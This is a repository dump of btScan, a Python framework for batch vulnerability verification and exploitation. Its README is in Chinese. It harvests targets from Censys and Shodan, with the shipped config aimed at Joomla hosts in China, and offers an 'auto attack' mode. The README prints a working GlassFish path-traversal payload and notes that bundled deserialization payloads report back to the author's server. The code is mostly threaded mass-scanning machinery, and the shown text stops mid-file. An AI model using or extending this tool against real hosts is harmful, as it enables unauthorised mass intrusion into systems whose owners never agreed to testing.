├── README.md
├── __init__.py
├── btScan.py
├── conf
    └── scan_rule.ini
├── crawl
    ├── NetSearch.py
    ├── __init__.py
    └── search_rule.ini
├── doc
    ├── crawl.txt
    ├── lib.txt
    └── node.txt
├── lib
    ├── __init__.py
    ├── __init__.pyc
    ├── cmdline.py
    ├── cmdline.pyc
    ├── include.py
    ├── include.pyc
    ├── ipparse.py
    ├── ipparse.pyc
    ├── report.py
    ├── report.pyc
    ├── scancore.py
    ├── scancore.pyc
    ├── scanframe.py
    ├── scanframe.pyc
    ├── scriptframe.py
    └── scriptframe.pyc
├── node
    ├── __init__.py
    ├── __init__.pyc
    ├── ext
    │   ├── ParseUrl.py
    │   ├── ParseUrl.pyc
    │   ├── __init__.py
    │   └── __init__.pyc
    ├── fortigate.py
    ├── fortigate.pyc
    ├── glassfish.py
    ├── glassfish.pyc
    ├── gres_weak.py
    ├── jboss_ser.py
    ├── jboss_ser.pyc
    ├── jenkins_ser.py
    ├── joomla.py
    ├── joomla.pyc
    ├── juniperBackdoor.py
    ├── redis_weak_ssh.py
    ├── static
    │   ├── jboss_poc.bin
    │   ├── jenkins_poc.bin
    │   ├── sshkey.txt
    │   └── weblogic_poc.bin
    ├── weblogic_ser.py
    └── weblogic_ser.pyc
├── report
    └── btscan_20151226_000414.html
├── requirements.txt
└── screenshot
    ├── exploit.png
    └── verify.png


/README.md:
--------------------------------------------------------------------------------
 1 | ## 目录结构
 2 | 
 3 |     --lib 核心文件库
 4 | 
 5 |     --report 报告生成的文件夹
 6 | 
 7 |     --node 里面每一个py文件是一个攻击向量，添加扫描节点也是向里面添加文件
 8 | 
 9 |     --crawl 通过空间搜索引擎抓取url或者ip的脚本
10 |     
11 | 
12 | ## 使用方法
13 |     python btScan.py
14 |     usage: btScan.py [options]
15 |     
16 |     * batch vulnerability verification and exploition framework. *
17 |     By he1m4n6a
18 |     
19 |     optional arguments:
20 |       -h, --help   show this help message and exit
21 |       -t THREADS   Num of scan threads for each scan process, 20 by default
22 |       -m MODE      select mode [config|script]
23 |                    e.g. -m script
24 |       -n NAME      from node floder choose a script
25 |       -c COMMAND   give an instruction when use script mode [verify|exploit]
26 |                    e.g. -c verify
27 |       -u URL_FILE  input url file
28 |       -i IP_FILE   input ip file
29 |       -autoIP      get ip from space search engine and auto attack
30 |       -autoURL     get url from space search engine and auto attack
31 |       -v           show program's version number and exit
32 | 
33 | 脚本存在两种验证模式，一种是通过加载模块，另一种是通过配置文件。复杂的可以通过加载脚本，简单的通过加载配置文件即可。然后攻击也有两种模式，验证verify模式和攻击exploit模式。 你也可以指定ip或者url作为输入格式，也可以自动获取ip或者url，那就是配合crawl文件下的网络空间抓取模块。
34 | 
35 | **示例**
36 | ```
37 | python btscan.py -n joomla -m script -c verify -u url.txt
38 | -n 指定node文件夹下的joomla.py，-m指定为script模式，即指定加载模块的模式。-c指定模式为验证，仅为验证就好了，-u指定输入为url的模式。
39 | ```
40 | ```
41 | python btscan.py -n joomla -m script -c exploit -u url.txt
42 | 同上，只是指定为攻击模式。
43 | ```
44 | ```
45 | python btscan.py  -m config -c verify -i ip.txts
46 | -m指定为config模式，-c指定为验证模式，-i指定输入的为ip模式，仅需通过conf目录下的scan_rule.ini的配置就够了。
47 | ```
48 | 
49 | 
50 | ## 插件编写规则
51 | 
52 | 仅需要在node文件夹下新增一个py文件
53 | 
54 | py文件中重要的有两个函数verify和exploit函数，没有exploit攻击模式，仅需要verify函数，返回值有三个值，第一个值是返回是否存在漏洞，返回True或者False；第二个值是返回url，第三个值返回需要打印的信息。
55 | 
56 | ***示例(glassfish.py为例)***
57 | 
58 | ```
59 | #!/usr/bin/env python
60 | #coding=utf8
61 | 
62 | import requests
63 | 
64 | def verify(ip):
65 |     url = 'https://' + str(ip) + ':4848//theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/'
66 |     try:
67 |         r = requests.get(url, verify=False, timeout=5)
68 |         if 'ejb-timer-service-app' in r.text:
69 |             msg = 'vul'
70 |             return True, ip, msg
71 | 	else:
72 |             msg = 'safe'
73 |             return False, ip, msg
74 |     except Exception, e:
75 |         #msg = str(e)
76 | 	msg = 'safe'
77 |         return False, ip, msg
78 | 
79 | 
80 | def exploit(ip):
81 |     verify(ip)
82 | ```
83 | 上面函数都可以自己定义，主要是verfiy和exploit函数，如果exploit函数和verify函数一样，exploit函数里面只要简单的调用verify(url)即可。
84 | 
85 | ## 其他
86 | 
87 | crwal文件夹的NetSearch.py里面的shadon和censys模块的密钥要自己填上。
88 | java反序列化的payload要自行更改，不然结果是发送到我的vps上。
89 | 
90 | 有任何交流和问题可以联系我he1m4n6a@163.com
91 | 


--------------------------------------------------------------------------------
/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/__init__.py


--------------------------------------------------------------------------------
/btScan.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #coding=utf8
 3 | 
 4 | import os
 5 | import glob
 6 | import sys
 7 | from string import Template
 8 | import time
 9 | import webbrowser
10 | from optparse import OptionParser
11 | from lib.cmdline import parse_args
12 | from lib.scancore import AbstractScan
13 | from lib.report import TEMPLATE_html
14 | 
15 | args = parse_args()
16 | 
17 | def main():
18 |     scanner = AbstractScan(args)
19 |     scanner.run()
20 | 
21 | if __name__ == '__main__':
22 |     main()


--------------------------------------------------------------------------------
/conf/scan_rule.ini:
--------------------------------------------------------------------------------
1 | [main]
2 | scan_rule = Hello, world
3 | res_rule = 
4 | payload = resin-doc/examples/quercus-hello/viewfile?file=hello.php
5 | method = get


--------------------------------------------------------------------------------
/crawl/NetSearch.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | #coding=utf8
  3 | 
  4 | import sys
  5 | import os
  6 | from censys import *
  7 | import censys
  8 | import shodan
  9 | import ConfigParser
 10 | sys.path.append('../lib')
 11 | import include
 12 | 
 13 | class CensysClass:
 14 |     #max request 120 times per 5 minutes.
 15 |     def __init__(self, querystr, start_page=1, max_page=10):
 16 |         self.api_id = ""
 17 |         self.api_secret = ""
 18 |         self.querystr = querystr
 19 |         self.START_PAGE = start_page
 20 |         self.MAX_PAGE = max_page
 21 | 
 22 |     #get ipv4 data
 23 |     def ipv4_data(self):
 24 |         reslist = []
 25 |         API_ID = self.api_id
 26 |         API_SECRET = self.api_secret
 27 |         try:
 28 |             api = censys.ipv4.CensysIPv4(api_id=API_ID, api_secret=API_SECRET)
 29 |             import pdb
 30 |             pdb.set_trace()
 31 |             res = api.search(self.querystr)
 32 |             matches = res['metadata']['count']
 33 |             pageNum = matches / 100
 34 |             maxPageNum = pageNum
 35 |             if matches % 100 != 0:
 36 |                 pageNum = pageNum + 1
 37 |             pageNum = self.MAX_PAGE if pageNum > self.MAX_PAGE else pageNum
 38 |             count = 1
 39 |             while count <= pageNum:
 40 |                 if self.START_PAGE > maxPageNum:
 41 |                     break
 42 |                 results = api.search(self.querystr, page=self.START_PAGE)
 43 |                 count = count + 1
 44 |                 self.START_PAGE = self.START_PAGE + 1
 45 |                 for result in results.get('results'):
 46 |                     #rr = "{0}:{1}".format(result.get("ip"), result.get('protocols')[0].split('/')[0])
 47 |                     rr = "{0}".format(result.get("ip"))
 48 |                     reslist.append(str(rr))
 49 |             return reslist
 50 |             # print  reslist
 51 |         except Exception, e:
 52 |             print str(e)
 53 | 
 54 |     #get website data
 55 |     def websites_data(self):
 56 |         reslist = []
 57 |         API_ID = self.api_id
 58 |         API_SECRET = self.api_secret
 59 |         try:
 60 |             api = censys.websites.CensysWebsites(api_id=API_ID, api_secret=API_SECRET)
 61 |             res = api.search(self.querystr)
 62 |             matches = res['metadata']['count']
 63 |             pageNum = matches / 100
 64 |             maxPageNum = pageNum
 65 |             if matches % 100 != 0:
 66 |                 pageNum = pageNum + 1
 67 |             pageNum = self.MAX_PAGE if pageNum > self.MAX_PAGE else pageNum
 68 |             count = 1
 69 |             while count <= pageNum:
 70 |                 if self.START_PAGE > maxPageNum:
 71 |                     break
 72 |                 results = api.search(self.querystr, page=self.START_PAGE)
 73 |                 count = count + 1
 74 |                 self.START_PAGE = self.START_PAGE + 1
 75 |                 for result in results.get('results'):
 76 |                     rr = result.get('domain')
 77 |                     reslist.append(str(rr))
 78 |             return reslist
 79 |             # print reslist
 80 |         except Exception, e:
 81 |             print str(e)
 82 | 
 83 | class ShodanClass: 
 84 |     #Free users only 100 item with 1 pages
 85 |     def __init__(self, querystr, MAX_PAGE=1):
 86 |         self.SHODAN_API_KEY = ""
 87 |         self.querystr = querystr
 88 |         self.MAX_PAGE = MAX_PAGE 
 89 |         
 90 |     def raw_data(self):
 91 |         SHODAN_API_KEY = self.SHODAN_API_KEY
 92 |         reslist = []
 93 |         try:
 94 |             api = shodan.Shodan(SHODAN_API_KEY)
 95 |             results = api.search(self.querystr, page=self.MAX_PAGE)
 96 |             for result in results['matches']:
 97 |                 rr = "{0}:{1}".format(result['ip_str'], str(result['port']))
 98 |                 reslist.append(str(rr))
 99 |             return reslist
100 |             # print reslist
101 |         except Exception, e:
102 |             print str(e)
103 | 
104 | 
105 | class NetSearch:
106 |     def __init__(self):
107 |         self.conf_file = include.search_rule_dir
108 | 
109 |     def getData(self):
110 |         try:
111 |             censys_list = []
112 |             shodan_list = []
113 |             cf = ConfigParser.ConfigParser()
114 |             cf.read(self.conf_file)
115 |             censys_items = cf.items("censys")
116 |             shodan_items = cf.items("shodan")
117 |             censys_start = censys_items[0][1]
118 |             censys_mode = censys_items[1][1]
119 |             censys_querystr = censys_items[2][1]
120 |             censys_start_page = int(censys_items[3][1])
121 |             censys_max_page = int(censys_items[4][1])
122 |             shodan_start = shodan_items[0][1]
123 |             shodan_querystr = shodan_items[1][1]
124 |             shodan_max_page = int(shodan_items[2][1])
125 |             # print censys_start, censys_mode, censys_querystr, censys_start_page, censys_max_page, shodan_start, shodan_querystr, shodan_max_page
126 | 
127 |             if censys_start == 'on':
128 |                 censys_class = CensysClass(censys_querystr, censys_start_page, censys_max_page)
129 |                 if censys_mode == "websites":
130 |                     censys_list = censys_class.websites_data()
131 |                 elif censys_mode == "ipv4":
132 |                     censys_list = censys_class.ipv4_data()
133 |                 else:
134 |                     msg = "error args"
135 |                     print msg
136 |                     exit(0)
137 |             if shodan_start == 'on':
138 |                 shodan_class = ShodanClass(shodan_querystr, shodan_max_page)            
139 |                 shodan_list = shodan_class.raw_data()
140 | 
141 |             if censys_list and shodan_list:
142 |                 rset = set(censys_list+shodan_list)
143 |                 return rset
144 |             elif censys_list:
145 |                 rset = set(censys_list)
146 |                 return rset
147 |             elif shodan_list:
148 |                 rset = set(shodan_list)
149 |                 return shodan_list
150 |             else:
151 |                 msg = 'None result'
152 |                 print msg
153 |                 exit(0)
154 |         except Exception, e:
155 |             print str(e)
156 | 
157 | if __name__ == '__main__':
158 |     fout = open('out.txt', 'w')
159 |     netsearch = NetSearch()
160 |     rset = netsearch.getData()
161 |     if rset != None:
162 |         for s in rset:
163 |             fout.write(s+'\n')
164 |     else:
165 |         print 'rset is none'
166 |         fout.close()
167 |         sys.exit()
168 |     print "\ntask all over.\n"
169 |     fout.close()


--------------------------------------------------------------------------------
/crawl/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/crawl/__init__.py


--------------------------------------------------------------------------------
/crawl/search_rule.ini:
--------------------------------------------------------------------------------
 1 | [censys]
 2 | start = on
 3 | mode = ipv4
 4 | querystr = joomla AND location.country='China'
 5 | start_page = 1
 6 | max_page = 100
 7 | 
 8 | [shodan]
 9 | start = off
10 | querystr = redis
11 | max_page = 1


--------------------------------------------------------------------------------
/doc/crawl.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/doc/crawl.txt


--------------------------------------------------------------------------------
/doc/lib.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/doc/lib.txt


--------------------------------------------------------------------------------
/doc/node.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/doc/node.txt


--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/__init__.py


--------------------------------------------------------------------------------
/lib/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/__init__.pyc


--------------------------------------------------------------------------------
/lib/cmdline.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #coding=utf8
 3 | 
 4 | import argparse
 5 | import sys
 6 | import os
 7 | 
 8 | p_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
 9 | 
10 | def check_args(args):
11 |     if not args.m:
12 |         msg = 'Use -m to set attack Mode'
13 |         raise Exception(msg)
14 |     if args.m == 'config' and args.i:
15 |         msg = 'Config mode not support ip format, please use -u'
16 |     if args.autoIP and args.autoURL:
17 |         msg = 'Only use one auto method'
18 |         raise Exception(msg)
19 |     if not args.autoIP and not args.autoURL:
20 |         if not args.u and not args.i:
21 |             msg = 'You should choose a method assign a file'
22 |             raise Exception(msg)
23 |     if args.u and args.i:
24 |         msg = 'Only use -u or -i assign a file'
25 |         raise Exception(msg)
26 |     if args.u and not os.path.isfile(args.u):
27 |         msg = 'TargetFile not found: %s' %args.u
28 |         raise Exception(msg)
29 |     if args.i and not os.path.isfile(args.i):
30 |         msg = 'TargetFile not found: %s' %args.i
31 |         raise Exception(msg)
32 |     if args.m == 'script' and not args.n:
33 |         msg = 'Use -n to choose a script which from node floder' 
34 |         raise Exception(msg)
35 |     if args.n and not os.path.isfile(p_path + os.sep + 'node' + os.sep + args.n + '.py'):
36 |         msg = 'Script name not found: %s.py' %args.n
37 |         raise Exception(msg)
38 |     if args.c not in ('verify', 'exploit'):
39 |         msg = 'Use -c to choose a correct command'
40 |         raise Exception(msg)
41 | 
42 | def parse_args():
43 |     parser = argparse.ArgumentParser(prog='btScan',
44 |                                     formatter_class=argparse.RawTextHelpFormatter,
45 |                                     description='* batch vulnerability verification and exploition framework. *\nBy he1m4n6a',
46 |                                     usage='btScan.py [options]')
47 |     parser.add_argument('-t', metavar='THREADS', type=int, default=20,
48 |                         help='Num of scan threads for each scan process, 20 by default')
49 |     parser.add_argument('-m', metavar='MODE', type=str, default='',
50 |                         help='select mode [config|script] \ne.g. -m script')
51 |     parser.add_argument('-n', metavar='NAME', type=str,
52 |         help='from node floder choose a script')
53 |     parser.add_argument('-c', metavar='COMMAND', type=str, default='verify',
54 |         help='give an instruction when use script mode [verify|exploit]\ne.g. -c verify')
55 |     parser.add_argument('-u', metavar='URL_FILE', type=str, default='',
56 |                         help='input url file')
57 |     parser.add_argument('-i', metavar='IP_FILE', type=str, default='',
58 |                         help='input ip file')
59 |     parser.add_argument('-autoIP', action='store_true',
60 |                         help='get ip from space search engine and auto attack')
61 |     parser.add_argument('-autoURL', action='store_true',
62 |                         help='get url from space search engine and auto attack')
63 |     parser.add_argument('-v', action='version', version='%(prog)s 1.0    By he1m4n6a')
64 | 
65 |     if len(sys.argv) == 1:
66 |         sys.argv.append('-h')
67 |     args = parser.parse_args()
68 |     check_args(args)
69 |     return args


--------------------------------------------------------------------------------
/lib/cmdline.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/cmdline.pyc


--------------------------------------------------------------------------------
/lib/include.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #coding=utf8
 3 | 
 4 | import os
 5 | import sys
 6 | 
 7 | p_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
 8 | lib_dir = os.path.dirname(os.path.abspath(__file__))
 9 | scan_rule_dir = p_dir + os.path.sep + "conf" + os.path.sep + "scan_rule.ini"
10 | crawl_dir = p_dir + os.path.sep + "crawl"
11 | search_rule_dir = crawl_dir + os.path.sep + 'search_rule.ini'
12 | 
13 | sys.path.append(p_dir)
14 | sys.path.append(lib_dir)
15 | sys.path.append(crawl_dir)
16 | sys.path.append(search_rule_dir)


--------------------------------------------------------------------------------
/lib/include.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/include.pyc


--------------------------------------------------------------------------------
/lib/ipparse.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #coding=utf8
 3 | 
 4 | #parse ip
 5 | class Ipparse():
 6 |     # convert an IP address from its dotted-quad format to its 
 7 |     # 32 binary digit representation
 8 |     def __init__(self):
 9 |         pass
10 | 
11 |     # convert a decimal number to binary representation 
12 |     # if d is specified, left-pad the binary number with 0s to that length 
13 |     @staticmethod
14 |     def dec2bin(n,d=None): 
15 |         s = "" 
16 |         while n>0: 
17 |             if n&1: 
18 |                 s = "1"+s 
19 |             else: 
20 |                 s = "0"+s 
21 |             n >>= 1 
22 |         if d is not None: 
23 |             while len(s)<d: 
24 |                 s = "0"+s 
25 |         if s == "": s = "0" 
26 |         return s 
27 | 
28 |     @staticmethod
29 |     def ip2bin(ip): 
30 |         b = "" 
31 |         inQuads = ip.split(".") 
32 |         outQuads = 4 
33 |         for q in inQuads: 
34 |             if q != "": 
35 |                 b += Ipparse.dec2bin(int(q),8) 
36 |                 outQuads -= 1 
37 |         while outQuads > 0: 
38 |             b += "00000000" 
39 |             outQuads -= 1 
40 |         return b 
41 |     
42 |     # convert a binary string into an IP address
43 |     @staticmethod 
44 |     def bin2ip(b): 
45 |         ip = "" 
46 |         for i in range(0,len(b),8): 
47 |             ip += str(int(b[i:i+8],2))+"." 
48 |         return ip[:-1] 
49 | 
50 |     # print a list of IP addresses based on the CIDR block specified
51 |     @staticmethod 
52 |     def listCIDR(c):
53 |         cidrlist = []
54 |         if c.find('-') == -1:
55 |             parts = c.split("/")
56 |             baseIP = Ipparse.ip2bin(parts[0])
57 |             subnet = int(parts[1])
58 |             if subnet == 32:
59 |                 cidrlist.append(Ipparse.bin2ip(baseIP))
60 |                 return cidrlist
61 |             elif subnet > 32:
62 |                 return []
63 |             else:
64 |                 ipPrefix = baseIP[:-(32-subnet)]
65 |                 for i in range(2**(32-subnet)):
66 |                     cidrlist.append(Ipparse.bin2ip(ipPrefix+Ipparse.dec2bin(i, (32-subnet)))) 
67 |                 return cidrlist 
68 |         else:
69 |             parts = c.split('-')
70 |             baseIP = parts[0].split('.')
71 |             iptmp = baseIP[0] + '.' + baseIP[1] + '.' + baseIP[2] + '.'
72 |             startIP = baseIP[3]
73 |             endIP = parts[1]
74 |             for a in range(int(startIP), int(endIP)+1):
75 |                 ipNew = iptmp + str(a)
76 |                 cidrlist.append(ipNew)
77 |             return cidrlist


--------------------------------------------------------------------------------
/lib/ipparse.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/ipparse.pyc


--------------------------------------------------------------------------------
/lib/report.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | #coding=utf8
 3 | 
 4 | TEMPLATE_html = """
 5 | <html>
 6 | <head>
 7 | <title>btScan Report</title>
 8 | <style>
 9 |     body {width:960px; margin:auto; margin-top:10px; background:rgb(200,200,200);}
10 |     p {color: #666;}
11 |     h2 {color:#002E8C; font-size: 1em; padding-top:5px;}
12 | </style>
13 | </head>
14 | <body>
15 | <h2 align="left"><font face="Verdana" size="5">
16 | btscan v1.0 scan report
17 | </font></h2>
18 | <hr>
19 | <br>
20 | <ul>
21 |     ${content}
22 | <ul>
23 | </body>
24 | </html>
25 | """
26 | 
27 | TEMPLATE_li = """
28 | <li class="high"> <font face="Verdana" color="#FF0000" size="2">[${msg}]</font> <a href="${href}" target="_blank">${href}</a> </li>
29 | """


--------------------------------------------------------------------------------
/lib/report.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/report.pyc


--------------------------------------------------------------------------------
/lib/scancore.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | #coding=utf8
  3 | 
  4 | import os
  5 | import sys
  6 | import re
  7 | import include
  8 | import requests
  9 | import urlparse
 10 | import ConfigParser
 11 | from crawl.NetSearch import NetSearch
 12 | from scanframe import ScanFrame
 13 | from scriptframe import ScriptFrame
 14 | from cmdline import parse_args
 15 | from ipparse import Ipparse
 16 | 
 17 | class AbstractScan():
 18 |     def __init__(self, args):
 19 |         self.args = args
 20 | 
 21 |     '''judge ip legal or not'''
 22 |     @staticmethod
 23 |     def judegIp(ip):
 24 |         ip = str(ip)
 25 |         reg = re.compile(r'\d+\.\d+\.\d+\.\d+[\-\/]?[\d]*')
 26 |         try:
 27 |             return reg.findall(ip)[0]
 28 |         except Exception, e:
 29 |             return False
 30 | 
 31 |     '''parse url or ip_url'''
 32 |     def parse_url(self, url_list):
 33 |         url_res = []
 34 |         for url in url_list:
 35 |             try:
 36 |                 _ = urlparse.urlparse(url, 'http')
 37 |                 if not _.netloc:
 38 |                     _ = urlparse.urlparse('http://' + url, 'http')
 39 |                 #assert(_.netloc != '')
 40 |                 if _.port == 443:
 41 |                     _url = "https://" + _.netloc
 42 |                 else:
 43 |                     _url = _.scheme + '://' + _.netloc
 44 |                 if _.path:
 45 |                     _url += _.path
 46 |                 else:
 47 |                     _url += '/' 
 48 |                 url_res.append(_url)
 49 |             except Exception, e:
 50 |                 # print str(e)
 51 |                 pass
 52 |         return url_res
 53 | 
 54 |     '''parse ip, support cidr format'''
 55 |     def parse_ip(self, ip_list):
 56 |         ip_res = []
 57 |         for ip in ip_list:
 58 |             ip = ip.strip('\n').strip()
 59 |             ip = AbstractScan.judegIp(ip)
 60 |             if ip:
 61 |                 pass
 62 |             else:
 63 |                 continue
 64 |             #parse cidr
 65 |             if '/' in ip or '-' in ip:
 66 |                 ip_res += Ipparse.listCIDR(ip)
 67 |             else:
 68 |                 ip_res.append(ip)
 69 |         return ip_res
 70 | 
 71 |     '''get rule from the configuration file'''
 72 |     def get_rule(self):
 73 |         cf = ConfigParser.ConfigParser()
 74 |         cf.read(include.scan_rule_dir)
 75 |         items = cf.items("main")
 76 |         scan_rule = items[0][1]
 77 |         res_rule = items[1][1]
 78 |         return scan_rule, res_rule
 79 | 
 80 |     '''get payload and method from configuration file'''
 81 |     def get_pm(self):
 82 |         cf = ConfigParser.ConfigParser()
 83 |         cf.read(include.scan_rule_dir)
 84 |         items = cf.items("main")
 85 |         payload = items[2][1]
 86 |         method = items[3][1]
 87 |         return payload, method
 88 | 
 89 |     '''scan use script method'''
 90 |     def scan_script(self):
 91 |         thread_num = self.args.t
 92 |         script_name = self.args.n
 93 |         script_name = "node." +  script_name
 94 | 
 95 |         #auto get ip from space search engine
 96 |         if self.args.autoIP:
 97 |             netsearch = NetSearch()
 98 |             ip_list = list(netsearch.getData())
 99 |             sscanner = ScriptFrame(ip_list, thread_num, script_name, self.args.c)
100 | 
101 |         #auto get url from space search engine
102 |         elif self.args.autoURL:
103 |             netsearch = NetSearch()
104 |             url_list = list(netsearch.getData())
105 |             url_list = self.parse_url(url_list)
106 |             sscanner = ScriptFrame(url_list, thread_num, script_name, self.args.c)
107 | 
108 | 
109 |         #handle ip file
110 |         elif self.args.i:
111 |             ip_file = self.args.i
112 |             with open(ip_file, 'r') as ip:
113 |                 ip_list = ip.read().split('\n')
114 |             func = lambda ip_list: ip_list if ''.join(ip_list[-1:]) else ip_list[:-1]
115 |             ip_list = func(ip_list)
116 |             ip_list = self.parse_ip(ip_list)
117 |             sscanner = ScriptFrame(ip_list, thread_num, script_name, self.args.c)
118 | 
119 | 
120 |         #handle url file 
121 |         elif self.args.u:
122 |             url_file = self.args.u
123 |             if not os.path.exists(url_file):
124 |                 print "[-]Error Message! Url File not exitst!"
125 |                 sys.exit()
126 |             with open(url_file, 'r') as url:
127 |                 url_list = url.read().split('\n')
128 |             func = lambda url_list: url_list if ''.join(url_list[-1:]) else url_list[:-1]
129 |             url_list = func(url_list)
130 |             url_list = self.parse_url(url_list)
131 |             sscanner = ScriptFrame(url_list, thread_num, script_name, self.args.c)
132 | 
133 |         else:
134 |             raise Exception('not url find')
135 | 
136 |         # sscanner = ScriptFrame(ui_list, thread_num, script_name, self.args.c)
137 |         sscanner.scan()
138 |         sscanner.script_report()
139 | 
140 |     '''scan specific code, url pattern'''
141 |     def scan_url(self):
142 |         scan_rule, res_rule = self.get_rule()
143 |         payload, method = self.get_pm()
144 |         thread_num = self.args.t
145 |         url_list = []
146 |         #get ip auto from space search engine
147 |         if self.args.autoIP:
148 |             netsearch = NetSearch()
149 |             url_list = list(netsearch.getData())
150 |             url_list = self.parse_url(url_list)
151 |         #get url auto from space search engine
152 |         elif self.args.autoURL:
153 |             netsearch = NetSearch()
154 |             url_list = list(netsearch.getData())
155 |             url_list = self.parse_url(url_list)
156 |         #handle url file
157 |         elif self.args.u:
158 |             url_file = self.args.u
159 |             with open(url_file, 'r') as url:
160 |                 url_list = url.read().split('\n')
161 |             func = lambda url_list: url_list if ''.join(url_list[-1:]) else url_list[:-1]
162 |             url_list = func(url_list)
163 |             url_list = self.parse_url(url_list)
164 |         #handle ip file
165 |         elif self.args.i:
166 |             url_file = self.args.i
167 |             with open(url_file, 'r') as url:
168 |                 url_list = url.read().split('\n')
169 |             func = lambda url_list: url_list if ''.join(url_list[-1:]) else url_list[:-1]
170 |             url_list = func(url_list)
171 |             url_list = self.parse_url(self.parse_ip(url_list))
172 | 
173 |         scanner = ScanFrame(url_list, payload, scan_rule, res_rule, method, thread_num)
174 |         scanner.scan()
175 | 
176 |     '''scanning method'''
177 |     def run(self):
178 |         mode = self.args.m
179 |         #start the mode of config
180 |         if mode == 'config':
181 |             self.scan_url()
182 | 
183 |         #start the mode of script
184 |         elif mode == 'script':
185 |             self.scan_script()
186 |                      
187 |         else:
188 |             raise Exception('[-]Error Message! You put incorrect mode args')
189 | 


--------------------------------------------------------------------------------
/lib/scancore.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/he1m4n6a/btScan/443a675c840b980d31b9c9ad8ab3bd18754e278d/lib/scancore.pyc


--------------------------------------------------------------------------------
/lib/scanframe.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | #coding=utf8
  3 | 
  4 | import re
  5 | import requests
  6 | import include
  7 | import ConfigParser
  8 | from Queue import Queue
  9 | from threading import Thread, Lock
 10 | 
 11 | method = None
 12 | 
 13 | class ScanFrame:
 14 |     def __init__(self, url_list, payload, scan_rule, res_rule, method, thread_num):
 15 |         self.url_list = url_list
 16 |         self.payload = payload
 17 |         self.scan_rule = scan_rule
 18 |         self.res_rule = res_rule
 19 |         self.method = method
 20 |         self.thread_num = thread_num
 21 | 
 22 |     '''handle get method'''
 23 |     def scan(self):
 24 |         f = open('res.txt', 'w')
 25 |         queue = Queue()
 26 |         #start thread_num thread
 27 |         for i in xrange(self.thread_num):
 28 |             worker = ScanWorker(queue)
 29 |             worker.daemon = True
 30 |             worker.start()
 31 | 
 32 |         #Add links to the queue
 33 |         for url in self.url_list:
 34 |             if self.method == "get":
 35 |                 if self.payload:
 36 |                     url_full = url + self.payload
 37 |                 else:
 38 |                     url_full = url
 39 |                 queue.put((url_full, f, self.scan_rule, self.res_rule))
 40 | 
 41 |             if self.method == "post":
 42 |                 if self.payload:
 43 |                     url_full = url
 44 |                     data = dict([tuple(x.split("=")) for x in self.payload.split("&")])
 45 |                     queue.put((url, f, data, self.scan_rule, self.res_rule))
 46 | 
 47 |         queue.join()
 48 |         f.close()
 49 | 
 50 | '''work threads'''
 51 | class ScanWorker(Thread):
 52 |     def __init__(self, queue):
 53 |         Thread.__init__(self)
 54 |         self.queue = queue
 55 | 
 56 |     def run(self):
 57 |         cf = ConfigParser.ConfigParser()
 58 |         cf.read(include.scan_rule_dir)
 59 |         items = cf.items("main")
 60 |         method = items[3][1]
 61 |         while True:
 62 |             # handle get method
 63 |             if method == "get":
 64 |                 url_full, f, scan_rule, res_rule = self.queue.get()
 65 |                 try:
 66 |                     r = requests.get(url_full, verify=False)
 67 |                     if r.status_code != 200:
 68 |                         # raise Exception
 69 |                         mlock = Lock()
 70 |                         mlock.acquire()
 71 |                         mlock.release()
 72 |                     page_content = r.content
 73 |                     scan_reg = re.compile(r'%s' %scan_rule)
 74 |                     res_reg = None
 75 |                     if res_rule:
 76 |                         res_reg = re.compile(r'%s' %res_rule)
 77 |                     res = url_full
 78 |                     if scan_reg.search(page_content) != None:
 79 |                         #if define reg_rule, get reg result
 80 |                         if res_reg:
 81 |                             if res_reg.findall(page_content) != []:
 82 |                                 for item in res_reg.findall(page_content):
 83 |                                     res += "\t" + item
 84 |                                 res += "\n"
 85 |                                 mlock = Lock()
 86 |                                 mlock.acquire()
 87 |                                 print "[+]%s" %res
 88 |                                 f.write(res)
 89 |                                 mlock.release()
 90 |                             else:
 91 |                                 mlock = Lock()
 92 |                                 mlock.acquire()
 93 |                                 print "[-]%s" %url_full
 94 |                                 mlock.release()
 95 |                         #just only judge exploit or not
 96 |                         else:
 97 |                             mlock = Lock()
 98 |                             mlock.acquire()
 99 |                             print "[+]%s" %url_full
100 |                             f.write(url_full+'\n')
101 |                             mlock.release()
102 |                     else:
103 |                         mlock = Lock()
104 |                         mlock.acquire()
